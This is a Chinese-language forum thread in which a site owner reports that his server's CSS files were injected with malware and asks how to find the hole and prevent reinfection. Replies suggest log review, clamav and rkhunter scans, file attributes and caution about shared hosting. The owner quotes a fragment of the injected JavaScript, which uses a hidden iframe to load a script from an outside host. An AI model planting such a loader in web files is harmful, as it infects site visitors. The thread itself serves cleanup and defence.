服务器的网站被挂马了，请求帮助

gavinkong

前几天服务器上的网站被挂马了，查看了被挂马的文件，都是些css文件，而且都是设置为777权限了。
我删除代码之后，把权限设置为644，css正常了，不会被挂马了。

但是因为一些目录必须是777的，而且里面是css，js，框架自动生成的。所以没办法更改权限。
所以就乱到这些文件被挂马了。

都是这样的代码

1. document.body.appendChild(i);i.co
   
2. ntentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.successtest.co.kr/files/yahoo.js></script>');}
   
3. ,1000);},1000);ele.style.zoom='1';}(this));

复制代码

请教高手，怎么查漏洞，清除完恶意代码后，怎么才能不让它又插入到文件？在此先谢谢了。

platinum

没有什么太好的办法，xscan 能不能扫出什么漏洞吗
另外，更多的可能是网站设计上的漏洞，这个要具体问题具体分析了，比如注入

chenyx

检查下web日志,看看是如何挂的马,然后再想办法

gavinkong

感谢楼上两位的提醒。
昨天安装了clamav扫描了整个系统，清除了一些恶意文件。今天早上终于看到没有被插入代码了。

platinum

还可以装一个 rkhunter，在线更新一下木马库，扫描一下系统内部可能被植入的木马

大鬼不动

升级内核，为文件设置扩展属性!

split_two

用Rsync+inotify吧！

andywhitestar

被挂马是个头疼的问题啊！

天机二十三

回复 2# platinum
你们的服务器是租用的还是独立的，如果是租用的，这个问题就不怎么好解决了；因为，就算你的网站安全级别很高；但是，如果在同一台服务器的其他网站安全级别不够的话，也是无用的；这个方法就是“旁注法”。
你的服务器是什么系统，数据库是什么架构？？？